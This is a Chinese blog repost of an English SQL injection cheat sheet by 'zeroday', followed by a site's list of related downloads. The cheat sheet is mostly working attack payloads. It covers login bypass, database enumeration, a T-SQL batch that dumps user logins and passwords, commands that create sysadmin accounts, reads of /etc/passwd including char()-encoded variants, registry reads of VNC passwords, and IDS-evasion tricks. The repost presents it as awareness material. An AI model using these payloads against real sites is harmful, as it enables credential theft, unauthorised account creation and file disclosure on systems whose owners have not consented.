下面介绍一下应用安全方面东东......也是检验应用健壮性的某方面安全考虑!下面是一老外针对sql注入技术的总结,看完后相信对依赖注入会有个相对全面的认识!下面一篇英文版的技术总结!本人也比较倾向于看一些关于英文的技术文章,一方面可以锻炼自己的应用文案的阅读能力!也建议大伙看一些英文版的技术文案,当然也不能说“咱崇洋媚外”,国外的一些“大牛"总结的一些东西确实值得我们学习和分享!下面内容希望对在方面有”盲点“朋友有所帮助(下面英文相对简单,有一定计算机基础英语的朋友阅读起来应该不是很难,在这里就不翻译了,多看英文文案有利无害.....):
SqlInjection Paper
By zeroday.
zeroday [ at ] blacksecurity.org
1.Introduction.
2.Testingfor vulnerabilities.
3.GatheringInformation.
4.Datatypes.
5.GrabbingPasswords.
6.CreateDB accounts.
7.MySQLOS Interaction.
8.Servername and config.
9.RetrievingVNC password from registry.
10.IDSSignature Evasion.
11.mySQLInput Validation Circumvention using Char().
12.IDSSignature Evasion using comments.
13.Stringswithout quotes.
1. When a box only has port 80 open, it'salmost certain the admin will patch his server,
The best thing to turn to is web attacks.Sql Injection is one of the most common web attacks.
You attack the web application, ( ASP, JSP,PHP, CGI..etc) rather than the webserver
or the services running on the OS.
Sql injection is a way to trick using aqurey or command as a input via webpages,
most websites take parameters from the userlike username and passwrod or even their emails.
They all use Sql querys.
2. First of you should start with somethingsimple.
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are simple ways to try another onesare:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) fromtablename--
3.Gathering Infomation.
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will Find the actual Version of thecomputer, OS/service pack.
4.Data types.
Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5.Grabbing passwords
'; begin declare @var varchar(8000) set@var=':' select @var=@var+'+login+'/'+password+' ' from users where login >@var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
6.Create DB accounts.
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' ,'sysadmin'
MySQL
INSERT INTO mysql.user (user, host,password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7.MySQL OS Interaction
- ' union select1,load_file('/etc/passwd'),1,1,1;
8.Server name and config.
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9.Retrieving VNC password from registry.
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x intoTEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
10.IDS Signature Evasion.
Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
11.mySQL Input Validation Circumventionusing Char().
Inject without quotes (string ="%"):
--> ' or username like char(37);
Inject with quotes(string="root"):
--> ' union select * from users wherelogin = char(114,111,111,116);
load files in unions (string ="/etc/passwd"):
-->' union select1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string ="n.ext"):
-->' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12.IDS Signature Evasion using comments.
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' ||'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
13.Strings without quotes.
-->INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) +char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) +char(0x65) + char(0x72), 0x64)
分享到:
相关推荐
SQL注射技术总结文档,有助于深入理解SQL语句,提高安全意识。
SQL安全隐患产生原因 2 1.SQL安全隐患 SQL安全隐患产生原因 SQL安全隐患简述 若服务器会将表单中输入的内容直接用于验证身份或者数据获取的查询,攻击者就会尝试输入某些特殊的SQL字符串篡改查询,改变其原来的功能...
[翻译]SQL注射技术总结文档
基于SQL server应用的高级SQL注入技术
Web应用安全之SQL注入超级进阶版!
SQL注射是最常用的攻击方式。你攻击WEN系统(ASP,PHP,JSP,CGI等)比去攻击系统或者其他的系统服务要简单的多。 SQL注射是通过页面中的输入来欺骗使得其可以运行我们构造的查询或者别的命令,我们知道在WEB上面有...
Web应用的安全攻防之SQL注入攻击(SQL Injection)Web应用的安全攻防之SQL注入攻击(SQL Injection)
支持SQL2005,利用SQL弱口令执行CMD命令, 支持利用临时表上传文件,支持XP——CMDSHELL修复
SQL注射 工具 美国精英开发 大家请下载 本人试用 很好用的
数据库应用技术SQL SERVER,介绍了SQL SERVER的基本内容与应用
数据库应用技术简明电子教案 SQL——server
SQL Server 2000数据库 简明教程 李存斌 主编
数据库应用技术——SQL Server 2000简明教程电子教案
数据库应用技术SQL Server 2005希望对大家平时的学习和复习应考有帮助!
SQL Server 2005数据库技术与应用-教程
数据库应用技术——SQL Server篇》 课件下载
数据库技术与应用--SQL Server 2005教程(詹英主编)数据库技术与应用--SQL Server 2005教程(詹英主编)
1.1 数据库技术基础 1.2 设计数据库 1.3 认识SQL Server 2005 1.4 知识进阶 2.1 认识SQL Server数据库 2.2 创建SQL Server数据库 2.3 管理SQL Server数据库 2.4 知识进阶 项目实训 .................